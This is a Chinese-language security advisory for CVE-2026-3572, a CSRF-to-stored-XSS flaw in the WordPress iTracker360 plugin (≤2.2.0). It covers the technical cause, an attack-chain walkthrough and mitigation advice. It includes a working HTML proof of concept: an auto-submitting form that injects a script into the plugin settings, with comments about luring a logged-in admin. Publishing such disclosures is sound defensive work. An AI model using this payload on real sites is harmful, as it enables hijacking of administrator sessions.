CVE-2026-3572 CVSS 6.1 中危

CVE-2026-3572 WordPress iTracker360插件CSRF致存储型XSS漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-3572

漏洞类型

CSRF, 存储型XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WordPress iTracker360 Plugin

漏洞概述

WordPress iTracker360插件2.2.0及以下版本存在CSRF导致存储型XSS漏洞。由于设置表单提交缺少nonce验证，且输入清理与输出转义不足，未认证攻击者可诱导管理员点击恶意链接，在系统后台注入并执行任意Web脚本，造成严重安全风险。

技术细节

该漏洞的核心在于WordPress iTracker360插件在处理设置更新请求时未实施有效的安全校验机制。具体而言，插件在设置表单提交过程中缺少nonce验证，无法确认请求来源的合法性。同时，对于用户提交的数据，插件缺乏足够的输入清理，且在输出时未进行必要的转义处理。攻击者可以构造一个恶意的HTML页面或链接，利用跨站请求伪造（CSRF）技术欺骗管理员点击。当管理员在已登录的状态下触发该请求时，恶意脚本代码将被提交并存储在服务器端。由于输出未转义，当管理员再次访问插件设置页面或其他显示该数据的页面时，恶意脚本将在浏览器上下文中执行，从而获取管理员权限或窃取敏感信息。

攻击链分析

STEP 1

1. 侦察

攻击者确认目标站点安装了存在漏洞的WordPress iTracker360插件（版本 <= 2.2.0）。

STEP 2

2. 武器化

攻击者构造包含恶意JavaScript代码的HTML页面，该页面包含一个自动提交的表单，指向插件的设置接口，且payload中包含XSS代码。

STEP 3

3. 投递

攻击者通过社会工程学手段（如发送钓鱼邮件）诱导已登录的管理员点击访问该恶意链接。

STEP 4

4. 利用

管理员访问链接后，浏览器自动向目标站点发送设置更新请求。由于缺少nonce验证，服务器接受请求并将恶意脚本存储到数据库中。

STEP 5

5. 执行

当管理员随后访问插件设置页面时，服务器回显未经过滤的恶意脚本，导致XSS在管理员浏览器中执行，攻击者借此接管会话。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
  PoC for CVE-2026-3572: CSRF to Stored XSS
  Usage: Host this file and trick the admin to visit it while logged into WordPress.
-->
<html>
  <body>
    <form action="http://target-wordpress-site/wp-admin/admin.php?page=itracker360-settings" method="POST">
      <!-- Vulnerable field injection -->
      <input type="hidden" name="itracker360_option_name" value="settings">
      <input type="hidden" name="some_vulnerable_field" value='"><script>alert(document.cookie)</script><"'>
      <input type="submit" value="Click Me">
    </form>
    <script>
      // Automatically submit the form to simulate the attack
      document.forms[0].submit();
    </script>
  </body>
</html>

影响范围

iTracker360 <= 2.2.0

防御指南

临时缓解措施

如果无法立即升级，建议暂时卸载或禁用iTracker360插件。管理员应避免点击不明链接，并检查插件设置页面是否存在异常数据。可通过Web应用防火墙（WAF）配置规则，拦截对插件设置页面的非正常POST请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表